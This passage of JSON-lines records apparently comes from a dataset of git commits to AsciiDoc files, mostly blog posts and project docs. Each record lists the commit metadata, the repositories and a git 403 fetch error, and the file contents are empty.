boot,joansmith\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,isopov\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,ollie314\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,bclozel\/spring-boot,olivergierke\/spring-boot,kamilszymanski\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,dfa1\/spring-boot,habuma\/spring-boot,lucassaldanha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,olivergierke\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a3e0ed6c0ea24cb3f18f9401d15f0be93a1a975","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5b8360c935a380a3631dc101c92e6990ba1d63","subject":"Update 2016-07-24-Forensic-Sasser-worm.adoc","message":"Update 2016-07-24-Forensic-Sasser-worm.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a1051f1b2def85295b84938c834c70393df166c","subject":"Upd link","message":"Upd link\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98f290004472f40712bc7021bb7b69a54af1aa69","subject":"Update 2018-04-07-search.adoc","message":"Update 
2018-04-07-search.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-04-07-search.adoc","new_file":"_posts\/2018-04-07-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d8964b38b19a51d610f5dd7e9812f542f2acb6","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5efe4b4e68dcaf1e1fc369f0adb5e8545695f57","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff32c45cf6cd3dc5ff6dca0ccf6b39bbe2cce9a8","subject":"Added Milestone 02 documentation","message":"Added Milestone 02 documentation\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/milestones\/milestone_2\/Flujos Milestone 02.asciidoc","new_file":"fermat-documentation\/milestones\/milestone_2\/Flujos Milestone 02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcc026ac076b8a1ce245dcb43897e8e2de28e5d7","subject":"Update 2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","message":"Update 2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","new_file":"_posts\/2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bcfad165d42a9a497d64bcde8f715b3a40ef4f8","subject":"service registry doc","message":"service registry 
doc\n","repos":"tdiesler\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,alvinkwekel\/camel,tdiesler\/camel,cunningt\/camel,pmoerenhout\/camel,zregvart\/camel,anoordover\/camel,jamesnetherton\/camel,gnodet\/camel,sverkera\/camel,kevinearls\/camel,gnodet\/camel,jamesnetherton\/camel,sverkera\/camel,christophd\/camel,tadayosi\/camel,anoordover\/camel,apache\/camel,objectiser\/camel,kevinearls\/camel,ullgren\/camel,adessaigne\/camel,zregvart\/camel,sverkera\/camel,zregvart\/camel,ullgren\/camel,onders86\/camel,tdiesler\/camel,kevinearls\/camel,christophd\/camel,tdiesler\/camel,mcollovati\/camel,Fabryprog\/camel,kevinearls\/camel,pax95\/camel,punkhorn\/camel-upstream,DariusX\/camel,apache\/camel,pax95\/camel,pmoerenhout\/camel,nicolaferraro\/camel,nicolaferraro\/camel,adessaigne\/camel,kevinearls\/camel,gnodet\/camel,dmvolod\/camel,christophd\/camel,sverkera\/camel,davidkarlsen\/camel,CodeSmell\/camel,dmvolod\/camel,objectiser\/camel,akhettar\/camel,alvinkwekel\/camel,gnodet\/camel,jamesnetherton\/camel,Fabryprog\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,dmvolod\/camel,mcollovati\/camel,gnodet\/camel,nikhilvibhav\/camel,onders86\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,akhettar\/camel,CodeSmell\/camel,tdiesler\/camel,davidkarlsen\/camel,ullgren\/camel,adessaigne\/camel,jamesnetherton\/camel,ullgren\/camel,onders86\/camel,DariusX\/camel,akhettar\/camel,sverkera\/camel,adessaigne\/camel,christophd\/camel,nikhilvibhav\/camel,Fabryprog\/camel,mcollovati\/camel,DariusX\/camel,tdiesler\/camel,nikhilvibhav\/camel,anoordover\/camel,anoordover\/camel,onders86\/camel,apache\/camel,onders86\/camel,akhettar\/camel,akhettar\/camel,kevinearls\/camel,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,objectiser\/camel,pmoerenhout\/camel,CodeSmell\/camel,cunningt\/camel,jamesnetherton\/camel,cunningt\/camel,anoordover\/camel,nicolaferraro\/camel,apache\/camel,nikhilvibhav\/camel,cunningt\/camel,Fabryprog\/camel,onders86\/camel,pax95\/camel,objectiser\/camel,dmvolod\/camel,pmoerenhout\/camel,davidkarlsen\/camel,tadayosi\/camel,punkhorn\/camel-upstream,dmvolod\/camel,tadayosi\/camel,sverkera\/camel,davidkarlsen\/camel,alvinkwekel\/camel,zregvart\/camel,dmvolod\/camel,anoordover\/camel,CodeSmell\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,punkhorn\/camel-upstream,akhettar\/camel","old_file":"camel-core\/src\/main\/docs\/service-registry.adoc","new_file":"camel-core\/src\/main\/docs\/service-registry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1078215e5912fccdef3253158b14d61b795950fa","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"bdd8e484d48b927f56b1379abddb2568cac47941","subject":"KUDU-1822. Update docs to build the documentation in ubuntu","message":"KUDU-1822. Update docs to build the documentation in ubuntu\n\nInclude two packages, gem and ruby-dev, in the instruction to\nbuild documentations for Ubutnu.\n\nChange-Id: I474a0ffd61b4c50b0c0b5885a4e615679b4ae630\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5608\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fde224838132797b9d75c8032c996749a9a2073","subject":"Update 2016-09-05-Test.adoc","message":"Update 2016-09-05-Test.adoc","repos":"rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io","old_file":"_posts\/2016-09-05-Test.adoc","new_file":"_posts\/2016-09-05-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rushil-patel\/rushil-patel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0377ba5fef61d09135276b696d9ce29893599705","subject":"Update 2017-10-21-TEST.adoc","message":"Update 2017-10-21-TEST.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2017-10-21-TEST.adoc","new_file":"_posts\/2017-10-21-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17d2d094faa656765375844b97795ab2daf9e75a","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b4fb39bd6e477cec7c228e461ad7be4caff5862","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 
2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45ffa25e9b377a9013c838be06fddfaf98cc4675","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3566ea0b280758189e407cbda8a35ba61f3be3e","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dbd75e7b3d873a57a7b5aa4ca02a3d6d2840106","subject":"Update 2017-06-13-Your-Blog-title.adoc","message":"Update 2017-06-13-Your-Blog-title.adoc","repos":"zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io","old_file":"_posts\/2017-06-13-Your-Blog-title.adoc","new_file":"_posts\/2017-06-13-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zakkum42\/zakkum42.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"471c7417bf03fab2ec1c53851eaf8881823c7e7d","subject":"Update 2017-08-09-Your-Blog-title.adoc","message":"Update 2017-08-09-Your-Blog-title.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-09-Your-Blog-title.adoc","new_file":"_posts\/2017-08-09-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a8c2914eeb1b7c198136bc02c394ba8c3ea2cfd","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3993b5dece6286d5fe1e1276814cc305ed3f8a4e","subject":"Update 
2015-07-01-Welcome.adoc","message":"Update 2015-07-01-Welcome.adoc","repos":"mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io","old_file":"_posts\/2015-07-01-Welcome.adoc","new_file":"_posts\/2015-07-01-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mathieu-pousse\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0e2430e5791247184061f5ef295a784ddda4af1","subject":"Update 2016-02-26-One-Two.adoc","message":"Update 2016-02-26-One-Two.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-One-Two.adoc","new_file":"_posts\/2016-02-26-One-Two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"133e9361459f54ddf0bb30302ad2cb7d6734f6ed","subject":"Update dbm-list-locks.adoc","message":"Update dbm-list-locks.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-list-locks.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-list-locks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45965e9aff0bf7f933508fd9f81eef2ef375bbc8","subject":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","message":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3161c393eb15fde3939e22922536eebad81e699f","subject":"fixed typo","message":"fixed typo\n","repos":"jakubjab\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"src\/docs\/arc42\/EN\/appendix-open_issues.adoc","new_file":"src\/docs\/arc42\/EN\/appendix-open_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4921b28d00cd4ce2b65c5572cab9e0d6b46d952","subject":"Update 2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","message":"Update 2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","repos":"anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io","old_file":"_posts\/2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","new_file":"_posts\/2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anuragsingh31\/anuragsingh31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a533f63d20473b3f7d2b7a048a8ec13f7942de73","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e009580357ad0e0d6242a172f2c9c0610251982b","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ccdfb6495e7d2e29c7646f45e5a141d677c832d","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a5b0e3aa98e4cb3414a4b972aa07d54b1de0654","subject":"RTGOV-570 Add Elasticsearch clustering information","message":"RTGOV-570 Add Elasticsearch clustering information\n","repos":"Governance\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov,Governance\/rtgov,jorgemoralespou\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov,Governance\/rtgov,objectiser\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov,Governance\/rtgov,objectiser\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov","old_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/objectiser\/rtgov.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"020138978eeb1e9f5ea6397abacd0242e8985cfa","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 
2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-json-decode-json-encode.adoc","new_file":"2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"383f2aba964c3dc746e71f2af60b669ff35e3ef1","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797936fd0c809d67294d1ffd08d3929e28b960f6","subject":"add README for AWS adapter","message":"add README for AWS adapter\n","repos":"olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function","old_file":"spring-cloud-function-adapters\/spring-cloud-function-adapter-aws\/README.adoc","new_file":"spring-cloud-function-adapters\/spring-cloud-function-adapter-aws\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olegz\/spring-cloud-function.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0842cfb30959fbc7bbf932777c7084e1fca2364d","subject":"Update 2015-04-14-HTML-Rundown.adoc","message":"Update 2015-04-14-HTML-Rundown.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-HTML-Rundown.adoc","new_file":"_posts\/2015-04-14-HTML-Rundown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f05c4f9443701258e6d84f4404c9fb3e358985f","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0d1c82abb75428058e7503ca9a49e845062b268","subject":"Update 2017-01-06-A-Small-Poem.adoc","message":"Update 
2017-01-06-A-Small-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-06-A-Small-Poem.adoc","new_file":"_posts\/2017-01-06-A-Small-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f023ac92f8d64b99d2ccc8ad6910e0a0d00f3042","subject":"Update 2018-05-14-Useful-links.adoc","message":"Update 2018-05-14-Useful-links.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2018-05-14-Useful-links.adoc","new_file":"_posts\/2018-05-14-Useful-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27b743fa17d22840358165bee56cb99caee43760","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"995b8d9f21f8fba8ad2bcf34ed6e56d86833cc57","subject":"y2b create post New 12\\","message":"y2b create post New 